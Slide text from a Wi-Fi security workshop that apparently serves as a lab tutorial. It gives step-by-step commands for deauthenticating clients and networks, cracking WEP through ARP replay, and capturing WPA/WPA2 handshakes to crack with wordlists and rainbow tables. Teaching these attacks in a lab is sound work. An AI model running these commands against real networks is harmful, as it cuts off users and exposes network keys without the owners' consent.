![Page 132: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/132.jpg)
Type #iw dev wlan1 scan passive | grep SSID
• iw– program we are using
• dev– indicates that we are identifying our Wi-Fi card by device number
and not physical number• wlan1
– interface we wish to scan on• passive
– indicates that no packets should be sent• | grep
– program that is used to search the output • SSID
– the word that grep will be searching for
![Page 133: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/133.jpg)
#iw dev wlan1 scan passive | grep SSID
![Page 134: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/134.jpg)
ACTIVE NETWORK SCAN
![Page 135: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/135.jpg)
Type #iwlist wlan1 scan | grep ESSID
• iwlist– program we are using
• wlan1– interface we are scanning on
• scan– indicates we wish to scan
• |grep– program used to search the output of iwlist
• ESSID– the word we are searching for with grep
![Page 136: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/136.jpg)
#iwlist wlan1 scan | grep ESSID
![Page 137: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/137.jpg)
DEAUTHENTICATION
![Page 138: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/138.jpg)
What is Deauthentication
• Management Frame in IEEE 802.11(Wi-Fi)
• Allows clients to be kicked off of a wireless access point
• These are naturally occurring in wireless traffic and users do not even recognize it
• We can send excessive amounts of these packets to prevent a client from connecting
![Page 139: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/139.jpg)
DEAUTHENTICATION DIRECTED AT A PARTICULAR CLIENT
![Page 140: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/140.jpg)
Type #airodump-ng mon0
• airodump-ng– program we are using
• mon0– interface we are operating on
![Page 141: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/141.jpg)
#airodump-ng mon0
![Page 142: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/142.jpg)
#airodump-ng mon0
• type ctrl-c when you have finished finding your target
![Page 143: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/143.jpg)
Type #iwconfig mon0 channel 11
• iwconfig– program we are using
• mon0– interface we are changing the channel
of• channel
– indicates we are changing the channel• 11
– channel we are changing to
![Page 144: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/144.jpg)
#iwconfig mon0 channel 11
![Page 145: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/145.jpg)
Type #aireplay-ng --ignore-negative-one -0 10 –a 00:1a:c4:51:3c:31 –c d4:20:6d:41:78:b2 mon0
• aireplay-ng– program we are using
• --ignore-negative-one– needed because of a potential driver issue– you may be able to get it to work without this
• -0– indicates deauthentication packet
• 10– number of deauths to send
• -a 00:1a:c4:51:3c:31– access point MAC address
• -c d4:20:6d:41:78:b2– client MAC address
• mon0– interface to send deauth packets out on
![Page 146: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/146.jpg)
#aireplay-ng --ignore-negative-one -0 10 –a 00:1a:c4:51:3c:31 –c
d4:20:6d:41:78:b2 mon0
![Page 147: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/147.jpg)
DEAUTHENTICATION DIRECTED TOWARD A SPECIFIC NETWORK
![Page 148: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/148.jpg)
Type #airodump-ng mon0
• airodump-ng– program we are using
• mon0– interface we are using
![Page 149: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/149.jpg)
#airodump-ng mon0
![Page 150: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/150.jpg)
#airodump-ng mon0
• type ctrl-c when you have finished finding your target
![Page 151: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/151.jpg)
Type #iwconfig mon0 channel 11
• iwconfig– program we are using
• mon0– interface we are changing the channel
of• channel
– indicates we are changing the channel• 11
– channel we are changing to
![Page 152: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/152.jpg)
#iwconfig mon0 channel 11
![Page 153: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/153.jpg)
Type #nano blacklist
• nano– text editor we are using– you may use something else if you
prefer• blacklist
– name of the text file we are editing
![Page 154: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/154.jpg)
#nano blacklist
![Page 155: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/155.jpg)
#nano blacklist
![Page 156: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/156.jpg)
#nano blacklist
• Separate MAC addresses by putting them on separate lines. In this case we are only targeting a single Access Point
• Type ctrl-x, y, enter– this saves the file
![Page 157: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/157.jpg)
Type #mdk3 mon0 d –b blacklist –c 11
• mdk3– program we are using
• mon0– interface we are deauthenticating from
• d– indicates deauthentication packets are to be sent
• -b– indicates that we are using a blacklist. We are wanting to attack the indicated
access points• blacklist
– file that has the list of MAC addresses to deauth• -c
– indicates what channel to use• 11
– channel the access points are operating on
![Page 158: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/158.jpg)
#mdk3 mon0 d –b blacklist –c 11
![Page 159: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/159.jpg)
#mdk3 mon0 d –b blacklist –c 11
• type ctrl-c to stop the program
![Page 160: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/160.jpg)
DEAUTHENTICATION DIRECTED TOWARD MULTIPLE NETWORKS
![Page 161: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/161.jpg)
Type #airodump-ng mon0
• airodump-ng– program we are using
• mon0– interface we are using
![Page 162: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/162.jpg)
#airodump-ng mon0
![Page 163: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/163.jpg)
Type #nano blacklist
• nano– text editor we are using– you may use something else if you
prefer• blacklist
– name of the text file we are editing
![Page 164: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/164.jpg)
#nano blacklist
![Page 165: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/165.jpg)
#nano blacklist
![Page 166: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/166.jpg)
#nano blacklist
• Separate MAC addresses by putting them on separate lines. In this case we are only targeting a single Access Point
• Type ctrl-x, y, enter– this saves the file
![Page 167: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/167.jpg)
Type #mdk3 mon0 d –b blacklist –c 6,11
• mdk3– program we are using
• mon0– interface we are deauthenticating from
• d– indicates deauthentication packets are to be sent
• -b– indicates that we are using a blacklist. We are wanting to attack the indicated
access points• blacklist
– file that has the list of MAC addresses to deauth• -c
– indicates what channel to use• 6,11
– channels the access points are operating on
![Page 168: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/168.jpg)
#mdk3 mon0 d –b blacklist –c 6,11
![Page 169: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/169.jpg)
#mdk3 mon0 d –b blacklist –c 6,11
• type ctrl-c to stop the program
![Page 170: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/170.jpg)
CLIENTS FORCED TO CONNECT TO A SPECIFIC ACCESS POINT
![Page 171: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/171.jpg)
Type #airodump-ng mon0
• airodump-ng– program we are using
• mon0– interface we are operating on
![Page 172: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/172.jpg)
#airodump-ng mon0
![Page 173: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/173.jpg)
#airodump-ng mon0
• type ctrl-c when done finding the access point to wish for clients to connect to
![Page 174: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/174.jpg)
Type #nano whitelist
• nano– text editor we are using– you may use something else if you
prefer• whitelist
– text file with the list of MAC addresses of the access points you want clients to be able to connect to
![Page 175: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/175.jpg)
#nano whitelist
![Page 176: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/176.jpg)
#nano whitelist
![Page 177: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/177.jpg)
#nano whitelist
• note that it is possible to enter multiple MAC addresses in this file as well
• type ctrl-x, y, enter with finished
![Page 178: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/178.jpg)
Type #mdk3 mon0 d –w whitelist
• mdk3– program we are using
• mon0– interface to send deauth packets from
• d– indicates to deauthenticate clients
• -w– indicates we are whitelisting specific access points
• whitelist– text file that contains the MAC address of the AP we want
clients to connect to– deauths all APs other than those on this list
![Page 179: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/179.jpg)
#mdk3 mon0 d –w whitelist
![Page 180: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/180.jpg)
#mdk3 mon0 d –w whitelist
• type ctrl-c when done sending deauth packets
![Page 181: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/181.jpg)
BREAKING ENCRYPTION
![Page 182: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/182.jpg)
BREAKING WEP ENCRYPTION
![Page 183: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/183.jpg)
Breaking WEP Encryption
![Page 184: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/184.jpg)
Breaking WEP Encryption
• Steps– Identify Network– Begin collecting data– cause extra data to be generated
• optional• will not want to be done if conducting a
passive attack– start cracking once the number of
Initialization Vectors(IVs) reaches 50,000
![Page 185: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/185.jpg)
Type #airodump-ng mon0
• airodump-ng– program we are using
• mon0– interface we are operating on
![Page 186: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/186.jpg)
#airodump-ng mon0
![Page 187: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/187.jpg)
#airodump-ng mon0
• Notice that in the ENC column it says WEP.
• Any WEP encrypted access point is vulnerable.
• type ctrl-c when you have finished finding your target
![Page 188: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/188.jpg)
#airodump-ng mon0
![Page 189: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/189.jpg)
#airodump-ng mon0
![Page 190: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/190.jpg)
Breaking WEP Encryption
• open a new table in the terminal window
• filenew tab
![Page 191: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/191.jpg)
Type #aireplay-ng --ignore-negative-one -1 0 –a 12:18:0a:21:ae:e4 –h 00:c0:ca:75:6f:ab mon0
• aireplay-ng– program we are using
• --ignore-negative-one– needed because of a potential driver issue– this may not be needed
• -1– Associates with the Access Point
• -a 12:18:0a:21:ae:e4– indicates MAC address of AP & MAC of the AP
• -h 00:c0:ca:75:6f:ab– sets source MAC address & MAC of our wireless card
• mon0– interface we are operating on
![Page 192: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/192.jpg)
Type #aireplay-ng --ignore-negative-one -1 0 –a 12:18:0a:21:ae:e4 –h 00:c0:ca:75:6f:ab mon0
![Page 193: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/193.jpg)
Type #aireplay-ng --ignore-negative-one -3 –b 12:18:0a:21:ae:e4 –h 00:c0:ca:75:6f:ab mon0
• aireplay-ng– program we are using
• --ignore-negative-one– needed because of a potential driver issue– this may not be needed
• -3– ARP Request Replay Attack– most effective way to generate new IVs
• -b 12:18:0a:21:ae:e4– indicates MAC address of AP & MAC of the AP
• -h 00:c0:ca:75:6f:ab– sets source MAC address & MAC of our wireless card
• mon0– interface we are operating on
![Page 194: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/194.jpg)
#aireplay-ng --ignore-negative-one -3 –b 12:18:0a:21:ae:e4 –h 00:c0:ca:75:6f:ab mon0
![Page 195: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/195.jpg)
Breaking WEP Encryption
• Go back to the first tab and wait until the number in the data column >50000
• This number is not set since the attack we are doing is based upon statistics.
• Sometimes you can break it with half as many and sometimes you need twice as many or more.
• The length of the key also contributes to the number of IVs that are needed
![Page 196: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/196.jpg)
Breaking WEP Encryption
![Page 197: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/197.jpg)
Breaking WEP Encryption
• Open a new tab in the terminal
![Page 198: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/198.jpg)
Type #aircrack-ng –b 12:18:0a:21:ae:e4 acm_wep-01.cap
• aircrack-ng– program we are using
• -b 12:18:0a:21:ae:e4– the MAC address of the target Access
Point• acm_wep-01.cap
– the file that contains the files captures with airodump-ng
![Page 199: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/199.jpg)
#aircrack-ng –b 12:18:0a:21:ae:e4 acm_wep-01.cap
![Page 200: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/200.jpg)
#aircrack-ng –b 12:18:0a:21:ae:e4 acm_wep-01.cap
• If you are not successful wait until the number captured increases to the suggested number and then try again
![Page 201: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/201.jpg)
#aircrack-ng –b 12:18:0a:21:ae:e4 acm_wep-01.cap
![Page 202: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/202.jpg)
#aircrack-ng –b 12:18:0a:21:ae:e4 acm_wep-01.cap
• If successful, you will see the image previous.
• Go back to the other two tabs and stop the running programs using ctrl-c
![Page 203: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/203.jpg)
BREAKING WPA&WPA2 ENCRYPTION
![Page 204: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/204.jpg)
Breaking WPA&WPA2 Encryption
• What makes WPA&WPA2 more difficult to break into?– larger key– does not use RC4– Used Network as well as password to
computer the key
![Page 205: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/205.jpg)
Breaking WPA&WPA2 Encryption
• No short cut like in breaking WEP• Must brute force the key• Hope that it is a dictionary word or
something very simple such as ten numbers
• Three networks set up for breaking into– dictionary password– 8-char alpha-numeric– random
![Page 206: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/206.jpg)
Breaking WPA&WPA2 Encryption
• Process– Begin listen to the packets on that
network– Capture 4-way handshake between
AP and client• this can be done passively or by
deauthentication – take that captured handshake and try
different sources of passwords to break it
– wait and see
![Page 207: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/207.jpg)
BREAKING WPA WITH A DICTIONARY LIST
![Page 208: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/208.jpg)
Type #airodump-ng mon0
• airodump-ng – program we are using
• mon0– interface we are using to listen on
![Page 209: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/209.jpg)
#airodump-ng mon0
![Page 210: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/210.jpg)
#airodump-ng mon0
• After finding the target network type ctrl-c to stop running the program
![Page 211: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/211.jpg)
Type #airodump-ng –c 11 --bssid 00:1a:c4:51:3c:31 --w acm_dictionary mon0
• airodump-ng– program we are using
• -c 11– says to listen on channel 11
• --bssid 00:1a:c4:51:3c:31– listen for traffic to and from this Access point
• --w acm_dictionary– file to save the data to
• mon0– interface we are listening on
![Page 212: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/212.jpg)
#airodump-ng –c 11 --bssid 00:1a:c4:51:3c:31 --w acm_dictionary mon0
![Page 213: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/213.jpg)
#airodump-ng –c 11 --bssid 00:1a:c4:51:3c:31 --w acm_dictionary mon0
![Page 214: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/214.jpg)
#airodump-ng –c 11 --bssid 00:1a:c4:51:3c:31 --w acm_dictionary mon0
• The previous image shows connected clients to the specific access point
• At this point you could wait for the handshake to occur or you could force it to occur by means of deauth
![Page 215: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/215.jpg)
Breaking WPA&WPA2 encryption
• Open a new tab in terminal• This can be done by going to
filenew tab
![Page 216: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/216.jpg)
Type #iwconfig mon0 channel 11
• iwconfig– program we are using
• mon0 – interface we are operating on
• channel– allows us to change the channel
• 11– specific channel we are changing the
interface to
![Page 217: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/217.jpg)
#iwconfig mon0 channel 11
![Page 218: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/218.jpg)
Type #aireplay-ng --ignore-negative-one -0 10 –a 00:1a:c4:51:3c:31 –c d4:20:6d:41:78:c9 mon0
• aireplay-ng– program we are using
• --ignore-negative-one– needed because of a potential driver issue– you may be able to get it to work without this
• -0– indicates deauthentication packet
• 10– number of deauths to send
• -a 00:1a:c4:51:3c:31– access point MAC address
• -c d4:20:6d:41:78:b2– client MAC address
• mon0– interface to send deauth packets out on
![Page 219: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/219.jpg)
#aireplay-ng --ignore-negative-one -0 10 –a 00:1a:c4:51:3c:31 –c d4:20:6d:41:78:c9 mon0
![Page 220: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/220.jpg)
Type #aireplay-ng --ignore-negative-one -0 10 –a 00:1a:c4:51:3c:31 –c d4:20:6d:41:78:c9 mon0
![Page 221: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/221.jpg)
Breaking WPA&WPA2 encryption
• Go back to the first tab and you should see an image similar to the following
• The WPA handshake in the top must be there to proceed
![Page 222: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/222.jpg)
#airodump-ng –c 11 --bssid 00:1a:c4:51:3c:31 --w acm_dictionary mon0
![Page 223: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/223.jpg)
Breaking WPA&WPA2 encryption
• Make sure the dictionary files that you downloaded earlier are in the same folder as your .cap files.
• This should be in the root directory• We will be demonstrating using the
english.txt file, however feel free to experiment with the others
![Page 224: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/224.jpg)
Type #aircrack-ng acm_dictionary-01.cap –w english.txt
• aircrack-ng– program we are using to crack the key
• acm_dictionary-01.cap– network capture file with the
handshake in it• -w
– indicates that a word list is to be used• english.txt
– the file name containing the wordlist
![Page 225: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/225.jpg)
#aircrack-ng acm_dictionary-01.cap –w english.txt
![Page 226: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/226.jpg)
#aircrack-ng acm_dictionary-01.cap –w english.txt
• If not successful that means that the password was not in that list of words
• You could try using a larger word list or begin brute forcing to break the password
• If successful you should see the following
![Page 227: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/227.jpg)
#aircrack-ng acm_dictionary-01.cap –w english.txt
![Page 228: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/228.jpg)
BREAKING WPA&WPA2 USING A RAINBOW TABLE
![Page 229: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/229.jpg)
What is a Rainbow Table
• pre-computed table of hashed value• they are built for a specific SSID(network
name)• built using a dictionary or some other source of
passwords• Takes a long time to compute and is a very
large file– Usually done on a very powerful computer
• The rainbow can then be used to quickly find a password
![Page 230: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/230.jpg)
Breaking WPA&WPA2 using a Rainbow Table
• Because we already have the handshake, we do not need to re-capture it.
• We will be using the same .cap file as the previous example
![Page 231: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/231.jpg)
Breaking WPA&WPA2 encryption
• Make sure the rainbow table that you downloaded earlier is in the same folder as your .cap files.
• This should be in the root directory• We will be demonstrating using the
acm_dictionary_hash file• This file was created from the
english.txt dictionary file specifically for this SSID
![Page 232: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/232.jpg)
Type #cowpatty –r acm_dictionary-01.cap –d acm_dictionary_hash –s
acm_dictionary• cowpatty– program we are using
• -r acm_dictionary-01.cap– the file that has the four way handshake in it
• -d acm_dictionary_hash– the file that is the pre-computed hashed for
this specific SSID• -s acm_dictionary
– telling cowpatty what the name of the network is
![Page 233: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/233.jpg)
#cowpatty –r acm_dictionary-01.cap –d acm_dictionary_hash –
s acm_dictionary
![Page 234: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/234.jpg)
#cowpatty –r acm_dictionary-01.cap –d acm_dictionary_hash –
s acm_dictionary• If the password was not in the
source file used to generate the rainbow table then this technique will fail and you’ll either have to try the dictionary attack, make a new rainbow table, or brute force the password
• If successful, you will see the following image
![Page 235: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/235.jpg)
#cowpatty –r acm_dictionary-01.cap –d acm_dictionary_hash –
s acm_dictionary
![Page 236: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/236.jpg)
COMPUTING A PERSONALIZED RAINBOW TABLE
![Page 237: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/237.jpg)
Computing a personalized rainbow table
• As this is very time consuming, it is usually only done for very common SSID names such as netgear, linksys, etc
• This is also used when you know the network name in advance and wish to prepare for the attack on the network
![Page 238: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/238.jpg)
Type #airodump-ng mon0
• airodump-ng – program we are using
• mon0– interface we are using to listen on
![Page 239: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/239.jpg)
#airodump-ng mon0
![Page 240: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/240.jpg)
#airodump-ng mon0
• After finding the target network type ctrl-c to stop running the program
![Page 241: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/241.jpg)
Type #genpmk –f english.txt –d acm_dictionary_hash –s
acm_dictionary• genpmk
– the program we are using• -f english.txt
– the file serving as the source of passwords• -d acm_dictionary_hash
– what the rainbow table should be saved as• -s acm_dictionary
– telling genpmk what the SSID is so that it can be hashed appropriately
![Page 242: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/242.jpg)
#genpmk –f english.txt –d acm_dictionary_hash –s
acm_dictionary
![Page 243: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/243.jpg)
#genpmk –f english.txt –d acm_dictionary_hash –s
acm_dictionary
![Page 244: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/244.jpg)
BRUTE FORCING A PASSWORD
![Page 245: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/245.jpg)
Brute forcing a password
• This is the most time consuming method although is guaranteed to eventually find the password
